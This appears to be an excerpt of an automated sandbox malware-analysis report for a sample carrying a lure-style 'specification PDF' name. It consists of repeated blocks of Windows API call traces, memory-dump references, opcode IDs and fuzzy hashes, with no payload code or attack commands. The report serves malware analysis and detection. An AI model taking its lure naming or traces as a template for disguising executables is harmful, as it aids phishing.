                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                      • Instruction ID: e94c8239dffc1bd2a3f2db5d14e32a9caa4ee41ad6e16f37d4dba5f370ec688d
                                      • Opcode Fuzzy Hash: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                      • Instruction Fuzzy Hash: C241F571204701AFDB22EF24DC84F2ABBE9AF85314F04469EF8559B391D730E904CB62
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003DDC00,00000000,?,?,?,?), ref: 003AA6D8
                                      • GetWindowLongW.USER32 ref: 003AA6F5
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003AA705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                      • Instruction ID: 17e4b9a4e06ef2e38cee95db115bd6f944229aca0628d6af39bc101d31032e6e
                                      • Opcode Fuzzy Hash: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                      • Instruction Fuzzy Hash: 98319032100A05ABDB128E74CC45FEB77A9EB4A324F254725F975932E0CB75AC50DB50
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003AA15E
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003AA172
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AA196
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                      • Instruction ID: 9491aeb65faa9ed33e9cdec7059fe091d7c35059da3a09f90fd85d951df9fee9
                                      • Opcode Fuzzy Hash: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                      • Instruction Fuzzy Hash: 0221AB33500618BBEF128FA4CC82FEA3B7AEF49714F110214FA55AB190D7B5AC55CBA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003AA941
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003AA94F
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003AA956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                      • Instruction ID: a2ce96dfc4fc017371ca6c8c9ecca0bbfe1035b9abe687eff71b71bd10052ee9
                                      • Opcode Fuzzy Hash: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                      • Instruction Fuzzy Hash: C92171B660060AAFEB12DF18CC91DB737ADEF5A3A4B45055DFA049B261CB31EC11CB61
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A9A30
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A9A40
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A9A65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                      • Instruction ID: 9c955436a549e4f508bd2639efe7ac9715c38c140804038caa7f4eeb8ef447eb
                                      • Opcode Fuzzy Hash: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                      • Instruction Fuzzy Hash: 4A218631610118BFDB128F54CC85FBB3BAEEF8A750F11412AF954AB190C7719C518790
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038DB0A
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038DB5E
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,003DDC00), ref: 0038DBB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      • API String ID: 2507767853-685833217
                                      • Opcode ID: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                      • Instruction ID: 36b5f9bd0677c5deaaac1661082ce4194540701130894f65273e3e4aab91f4a8
                                      • Opcode Fuzzy Hash: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                      • Instruction Fuzzy Hash: 5C215335A00208AFCB12EF65D985DEEBBF8EF49704B1440A9F509DB251DB71EA41CB61
                                      APIs
                                        • Part of subcall function 0037C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                        • Part of subcall function 0037C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                        • Part of subcall function 0037C82D: GetCurrentThreadId.KERNEL32 ref: 0037C864
                                        • Part of subcall function 0037C82D: AttachThreadInput.USER32(00000000), ref: 0037C86B
                                      • GetFocus.USER32 ref: 0037CA05
                                        • Part of subcall function 0037C876: GetParent.USER32(?), ref: 0037C884
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037CA4E
                                      • EnumChildWindows.USER32(?,0037CAC4), ref: 0037CA76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                      • String ID: %s%d
                                      • API String ID: 2776554818-1110647743
                                      • Opcode ID: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                      • Instruction ID: da71f5ecd25b613e6ec3d3d06ec88c97ce869ce89ebf99ac9adfb291cf325d7b
                                      • Opcode Fuzzy Hash: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                      • Instruction Fuzzy Hash: D31175715102057BCB23BF509C86FE9376C9F45714F00906AFE0CAE142DB74A546DB71
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003AA46D
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003AA482
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003AA48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                      • Instruction ID: 1b137bf9442fe3dc3b8ed93f8ee333441868e1706e5997e25928a77b43a22419
                                      • Opcode Fuzzy Hash: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                      • Instruction Fuzzy Hash: 4311E772200208BEEF225F65CC46FAB3B6DEF89754F024128FA45A61A1D7B2E811C724
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00362350,?), ref: 003622A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 003622A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 2574300362-340411864
                                      • Opcode ID: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                      • Instruction ID: 10ae4f635a3fca6262cbf21446ac0063556212b09b5a5b5e1ca4d0c921c619e1
                                      • Opcode Fuzzy Hash: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                      • Instruction Fuzzy Hash: ECE01A74A90701ABDB925F71ED49F653668BB00706F008434F142E90B4CFB65440DF08
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00362276), ref: 00362376
                                      • GetProcAddress.KERNEL32(00000000), ref: 0036237D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 2574300362-2819208100
                                      • Opcode ID: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                      • Instruction ID: 60f59e0b4ec5989ad281798e13c10b6d06e6ba528c4878880720411397683414
                                      • Opcode Fuzzy Hash: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                      • Instruction Fuzzy Hash: 86E0ECB4544701AFDB235F61FE0DF153A68B704702F124438F20EEA1B4CBBA6800DB18
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00361150,00000000,?,00367DA7,000000FF,0000001E,003F6D60,00000008,00367D0B,00000000,00000000), ref: 00361122
                                      • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00361134
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 1646373207-1276376045
                                      • Opcode ID: fcad9d5f99c29ddae6bf47a7b61f8254401c9091ff5ad1a5f26ec92a54732e09
                                      • Instruction ID: 1c518a42fe8d188d043b7874c981f3c315761146f9b983a8ebbb5eb387f84610
                                      • Opcode Fuzzy Hash: fcad9d5f99c29ddae6bf47a7b61f8254401c9091ff5ad1a5f26ec92a54732e09
                                      • Instruction Fuzzy Hash: 46D09E35654208BBDB039BA2DC06F9A7BACAB41B41F044074FA06E10A4EB61EF11A765
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003A21FB,?,003A23EF), ref: 003A2213
                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003A2225
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetProcessId$kernel32.dll
                                      • API String ID: 2574300362-399901964
                                      • Opcode ID: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                      • Instruction ID: 377c5f184875f753e64b17819e7f2d7697bc913a206f8621e04dd9665516bf9e
                                      • Opcode Fuzzy Hash: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                      • Instruction Fuzzy Hash: ADD0A73480071A9FD7675F34FC08B5376DCEB06300F154829F846E2150D770E8808750
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003442EC,?,003442AA,?), ref: 00344304
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                      • Instruction ID: 14f69b9f9b13018155dce60b926ab641e6817146d80015be1c36d42ca7e929e2
                                      • Opcode Fuzzy Hash: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                      • Instruction Fuzzy Hash: 05D0A7348047129FC7634F20EC0CB5276D8AB14701F154439F542D2160D7B0E8808710
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,003441BB,00344341,?,0034422F,?,003441BB,?,?,?,?,003439FE,?,00000001), ref: 00344359
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0034436B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                      • Instruction ID: 6c304e0e45ed581fdb2e277abb8e2a8acb9fe05437ce20bc6d21e3e261f51785
                                      • Opcode Fuzzy Hash: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                      • Instruction Fuzzy Hash: 83D0A934800712AFC7234F30EC09B9276E8AB20B15F16C43AF882D2290EBB0F8808B10
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0038051D,?,003805FE), ref: 00380547
                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00380559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1071820185
                                      • Opcode ID: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                      • Instruction ID: 15b9f70c088b1dbe07bf9243fbf402afbe20a113cf51d6d499c0fbe068d9457f
                                      • Opcode Fuzzy Hash: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                      • Instruction Fuzzy Hash: 8BD0A730414712DFC7629F21EC08A5677E8AB01301F15C46DF457D2250D670D8848B20
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0038052F,?,003806D7), ref: 00380572
                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00380584
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1587604923
                                      • Opcode ID: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                      • Instruction ID: 3271dc7b7e470bd90fb4d8384e53ece4c29d05a25879ddef1cac95945874962f
                                      • Opcode Fuzzy Hash: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                      • Instruction Fuzzy Hash: 49D05E304147169EC7626F20A848A5377E8AB05300F158469F942D2654D670D4848B20
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0039ECBE,?,0039EBBB), ref: 0039ECD6
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039ECE8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                      • Instruction ID: 0b199319a1db2fd5b49b0b7a142205c7b85b3c694367f345f3a36bd2db34ebed
                                      • Opcode Fuzzy Hash: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                      • Instruction Fuzzy Hash: CDD0A7308007239FCF239F61EC48A5376E8AB00300F158829F886D2150DB70D8808B10
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0039BAD3,00000001,0039B6EE,?,003DDC00), ref: 0039BAEB
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0039BAFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
